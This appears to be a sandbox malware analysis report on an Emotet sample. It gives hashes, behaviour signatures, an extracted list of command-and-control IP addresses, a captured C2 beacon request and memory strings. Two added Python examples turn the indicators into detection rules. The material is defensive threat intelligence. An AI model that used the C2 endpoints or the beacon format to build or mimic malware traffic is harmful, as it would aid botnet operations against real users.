Analysis Report 2ojdmC51As.exe

Overview

General Information

Sample Name: 2ojdmC51As.exe
Analysis ID: 319735
MD5: 5804d97670dcdfab88ba830682355dad
SHA1: 65c817fb511824fa185f34ecd744b836ed7a19eb
SHA256: 4e885ada930e285a005c5211b8a652dc0eb11a06ccf530561afa88aefe99c9fc

Most interesting Screenshot:

Detection

Emotet
Score: 80
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate running services
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Potential key logger detected (key state polling based)
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

AV Detection:

Found malware configuration
Source: 00000001.00000002.931629655.0000000002220000.00000040.00000001.sdmp Malware Configuration Extractor: Emotet {"C2 list": ["200.116.145.225:443", "96.126.101.6:8080", "5.196.108.185:8080", "167.114.153.111:8080", "194.187.133.160:443", "98.174.164.72:80", "103.86.49.11:8080", "78.24.219.147:8080", "50.245.107.73:443", "110.145.77.103:80", "94.200.114.161:80", "61.19.246.238:443", "194.4.58.192:7080", "209.54.13.14:80", "102.182.93.220:80", "186.70.56.94:443", "203.153.216.189:7080", "49.50.209.131:80", "176.113.52.6:443", "62.30.7.67:443", "61.76.222.210:80", "113.61.66.94:80", "157.245.99.39:8080", "216.139.123.119:80", "184.180.181.202:80", "123.142.37.166:80", "124.41.215.226:80", "119.59.116.21:8080", "41.185.28.84:8080", "5.39.91.110:7080", "220.245.198.194:80", "139.162.108.71:8080", "75.143.247.51:80", "74.214.230.200:80", "185.94.252.104:443", "208.180.207.205:80", "49.3.224.99:8080", "93.147.212.206:80", "182.208.30.18:443", "95.213.236.64:8080", "37.187.72.193:8080", "59.125.219.109:443", "37.179.204.33:80", "95.9.5.93:80", "168.235.67.138:7080", "118.83.154.64:443", "121.7.31.214:80", "74.208.45.104:8080", "87.106.136.232:8080", "138.68.87.218:443", "62.75.141.82:80", "66.76.12.94:8080", "202.134.4.216:8080", "47.36.140.164:80", "110.142.236.207:80", "134.209.144.106:443", "89.216.122.92:80", "75.188.96.231:80", "24.179.13.119:80", "218.147.193.146:80", "174.106.122.139:80", "71.15.245.148:8080", "104.131.11.150:443", "202.141.243.254:443", "94.230.70.6:80", "24.178.90.49:80", "97.82.79.83:80", "68.252.26.78:80", "173.63.222.65:80", "162.241.242.173:8080", "79.137.83.50:443", "80.241.255.202:8080", "120.150.60.189:80", "96.245.227.43:80", "50.91.114.38:80", "83.110.223.58:443", "24.230.141.169:80", "37.139.21.175:8080", "202.134.4.211:8080", "190.240.194.77:443", "176.111.60.55:8080", "123.176.25.234:80", "209.141.54.221:7080", "115.94.207.99:443", "50.35.17.13:80", "109.74.5.95:8080", "120.150.218.241:443", "121.124.124.40:7080", 
"217.20.166.178:7080", "108.46.29.236:80", "2.58.16.89:8080", "85.105.111.166:80", "137.59.187.107:8080", "139.162.60.124:8080", "76.175.162.101:80", "139.99.158.11:443", "104.131.123.136:443", "91.211.88.52:7080", "91.146.156.228:80", "172.104.97.173:8080", "89.121.205.18:80", "186.74.215.34:80", "61.33.119.226:443", "162.241.140.129:8080", "130.0.132.242:80", "190.108.228.27:443", "201.241.127.190:80", "87.106.139.101:8080", "78.188.106.53:443", "188.219.31.12:80", "76.171.227.238:80", "72.143.73.234:443", "62.171.142.179:8080", "139.59.60.244:8080", "24.137.76.62:80", "172.86.188.251:8080", "172.91.208.86:80", "94.23.237.171:443", "200.116.145.225:443", "96.126.101.6:8080", "5.196.108.185:8080", "167.114.153.111:8080", "194.187.133.160:443", "98.174.164.72:80", "103.86.49.11:8080", "78.24.219.147:8080", "50.245.107.73:443", "110.145.77.103:80", "94.200.114.161:80", "61.19.246.238:443", "194.4.58.192:7080", "209.54.13.14:80", "102.182.93.220:80", "186.70.56.94:443", "203.153.216.189:7080", "49.50.209.131:80", "176.113.52.6:443", "62.30.7.67:443", "61.76.222.210:80", "113.61.66.94:80", "157.245.99.39:8080", "
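The extracted configuration above is only useful once it is turned into indicators. The following is an added example (not part of the Joe Sandbox report) that parses the report's own "C2 list" text into de-duplicated endpoints and emits Suricata rules for them. The fragment embedded below is an abridged transcription of the report's list, kept in the same shape the page shows (a repeated entry and a truncated tail), so a regex is used instead of a JSON parser; the SID range is an assumption.

```python
"""Turn the extracted Emotet configuration into usable IOCs.
Added example, not part of the sandbox report."""
import ipaddress
import re
from collections import Counter

# Constructed input, abridged from the report. The report's copy repeats
# its first entries and is cut off mid-string, so it is not valid JSON.
CONFIG_FRAGMENT = (
    'Emotet {"C2 list": ["200.116.145.225:443", "96.126.101.6:8080", '
    '"5.196.108.185:8080", "167.114.153.111:8080", "194.187.133.160:443", '
    '"200.116.145.225:443", "157.245.99.39:8080", "'
)

# One quoted "ip:port" token; tolerant of the truncated tail.
C2_TOKEN = re.compile(r'"(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})"')


def parse_c2_list(fragment):
    """Return unique (ip, port) pairs in first-seen order.

    Malformed addresses and non-routable ranges are dropped so that a
    sandbox-side address can never end up on a blocklist."""
    seen = []
    for ip, port in C2_TOKEN.findall(fragment):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue
        if not addr.is_global:
            continue
        pair = (str(addr), int(port))
        if 0 < pair[1] < 65536 and pair not in seen:
            seen.append(pair)
    return seen


def port_histogram(c2s):
    """Ports in use; the report's list mixes 80, 443, 7080 and 8080."""
    return Counter(port for _, port in c2s)


def suricata_rules(c2s, sid_base=9000001):
    """One rule per C2 endpoint. sid_base is an assumed local SID range;
    use whatever range your sensor reserves for locally managed rules."""
    rules = []
    for offset, (ip, port) in enumerate(c2s):
        rules.append(
            f'alert tcp $HOME_NET any -> {ip} {port} '
            f'(msg:"Emotet C2 {ip}:{port} (Joe Sandbox analysis 319735)"; '
            'flow:to_server,established; classtype:trojan-activity; '
            f'sid:{sid_base + offset}; rev:1;)'
        )
    return rules


if __name__ == "__main__":
    c2s = parse_c2_list(CONFIG_FRAGMENT)
    print(f"{len(c2s)} unique C2 endpoints, ports: {dict(port_histogram(c2s))}")
    print("\n".join(suricata_rules(c2s)))
```

Feed the full list from the report into CONFIG_FRAGMENT to get the complete rule set; the duplicate entries the extractor printed collapse to one rule each.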
Machine Learning detection for sample
Source: 2ojdmC51As.exe Joe Sandbox ML: detected

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02272650 CryptAcquireContextW,CryptGenKey,CryptCreateHash,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptDecodeObjectEx, 1_2_02272650
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02272290 CryptGetHashParam,CryptEncrypt,CryptDestroyHash,CryptDuplicateHash,memcpy,CryptExportKey,GetProcessHeap,RtlAllocateHeap, 1_2_02272290
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_02271FB0 memcpy,GetProcessHeap,RtlAllocateHeap,CryptVerifySignatureW,CryptDestroyHash,CryptDecrypt,CryptDuplicateHash, 1_2_02271FB0
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_004182CC FindFirstFileA,FindClose, 0_2_004182CC
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 0_2_00417B29
Source: C:\Users\user\Desktop\2ojdmC51As.exe Code function: 0_2_022338F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,FindFirstFileW,_snwprintf,FindClose, 0_2_022338F0
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_004182CC FindFirstFileA,FindClose, 1_2_004182CC
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_00417B29 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA, 1_2_00417B29
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_022738F0 FindNextFileW,FindNextFileW,_snwprintf,GetProcessHeap,HeapFree,FindFirstFileW,FindFirstFileW,_snwprintf,FindClose,FindClose, 1_2_022738F0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.4:49742 -> 200.116.145.225:443
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: EPMTelecomunicacionesSAESPCO EPMTelecomunicacionesSAESPCO
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 200.116.145.225/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------hcIbcONokUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 200.116.145.225:443Content-Length: 4628Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 200.116.145.225
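The captured POST above carries several traits that separate it from real browser traffic: a literal IP in Host, plaintext HTTP on port 443, a multipart POST to a generated alphanumeric path, a Referer with no scheme, an IE user agent combined with headers IE never sent (Upgrade-Insecure-Requests, image/webp in Accept), and no DNS lookup before the connection. The following is an added example, not part of the Joe Sandbox report, that scores a request head on those traits. The captured request is transcribed from the report with its headers split onto separate lines and the body omitted; the benign comparison request, the indicator names and the alert threshold are assumptions.

```python
"""Heuristic scoring of the captured Emotet POST.
Added example, not part of the sandbox report."""
import ipaddress
import re

# Constructed from the report's "HTTP traffic detected" entry.
CAPTURED_REQUEST = """\
POST /0SatF/P7qctngEpv1Ya3fD3/jr1xjmE/NHdOxCQtbKORku0/xlzXExMFhF/ibPm1TBkGiQpYm/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Referer: 200.116.145.225/
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------hcIbcONok
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 200.116.145.225:443
Content-Length: 4628
Cache-Control: no-cache
"""

# Constructed benign request for comparison (hypothetical host).
BENIGN_REQUEST = """\
GET /search?q=emotet HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://www.example.com/
Upgrade-Insecure-Requests: 1
"""

ALERT_THRESHOLD = 4  # assumed; tune against your own traffic


def parse_request(raw):
    """Split a raw HTTP/1.1 request head into (method, path, headers)."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def emotet_http_indicators(raw, resolved_by_dns=False):
    """Return the names of the indicators that fire for one request head.
    Pass resolved_by_dns=False when, as the sandbox noted, the destination
    was contacted without a preceding DNS query."""
    method, path, h = parse_request(raw)
    hits = []
    hostname, _, port = h.get("host", "").partition(":")
    try:
        ipaddress.ip_address(hostname)
        hits.append("host_is_literal_ip")
    except ValueError:
        pass
    if port == "443":
        hits.append("plaintext_http_on_443")    # parseable HTTP, so no TLS
    if not resolved_by_dns:
        hits.append("no_preceding_dns_query")
    if method == "POST" and h.get("content-type", "").startswith("multipart/form-data"):
        hits.append("multipart_post")
    segments = [s for s in path.split("/") if s]
    if len(segments) >= 3 and all(re.fullmatch(r"[A-Za-z0-9]{4,24}", s) for s in segments):
        hits.append("random_alnum_path")        # generated URI, no file name or query
    referer = h.get("referer", "")
    if referer and "://" not in referer:
        hits.append("referer_without_scheme")   # browsers always send a full URL
    chrome_style = "upgrade-insecure-requests" in h or "image/webp" in h.get("accept", "")
    if "MSIE" in h.get("user-agent", "") and chrome_style:
        hits.append("browser_header_mismatch")  # IE UA with headers IE did not send
    return hits


def score_request(raw, resolved_by_dns=False):
    """Return (indicator list, alert flag) for one request head."""
    hits = emotet_http_indicators(raw, resolved_by_dns)
    return hits, len(hits) >= ALERT_THRESHOLD


if __name__ == "__main__":
    for label, raw, dns in (("captured", CAPTURED_REQUEST, False),
                            ("benign", BENIGN_REQUEST, True)):
        hits, alert = score_request(raw, dns)
        print(f"{label}: alert={alert} {hits}")
```

None of the indicators is conclusive on its own (literal-IP hosts and multipart POSTs both occur in legitimate traffic), which is why the verdict is a count against a threshold rather than a single match; the C2 address itself is better handled by the blocklist rules derived from the configuration.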
Source: C:\Windows\SysWOW64\setupugc\sort.exe Code function: 1_2_022729B0 InternetReadFile,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,HttpQueryInfoW, 1_2_022729B0
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000006.00000003.758933962.0000027873F2A000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD",
"MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-11-16T08:29:46.4904070Z||.||18ebec36-1675-40c0-a5d4-25e9e774360f||1152921505692410033||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
Source: svchost.exe, 00000006.00000003.758971863.0000027873F66000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.facebook.com (Facebook)
Source: svchost.exe, 00000006.00000003.758971863.0000027873F66000.00000004.00000001.sdmp String found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI", equals www.twitter.com (Twitter)
Source: svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B996-B100171CD4B1","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"8cb666bc-49d3-4722-bb14-5643aee3a729"},{"IdType":"LegacyWindowsPhoneProductId","Value":"94ad5279-e84a-4d40-b7cf-c6f16f916e6c"},{"IdType":"XboxTitleId","Value":"2124184622"}],"IngestionSourc
Source: svchost.exe, 00000006.00000003.753689942.0000027873F58000.00000004.00000001.sdmp String found in binary or memory: !\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"detective manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle game journey 
","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"828B5831.HiddenCityMysteryofShadows","PublisherCertificateName":"CN=A4F05332-BE3A-4155-B9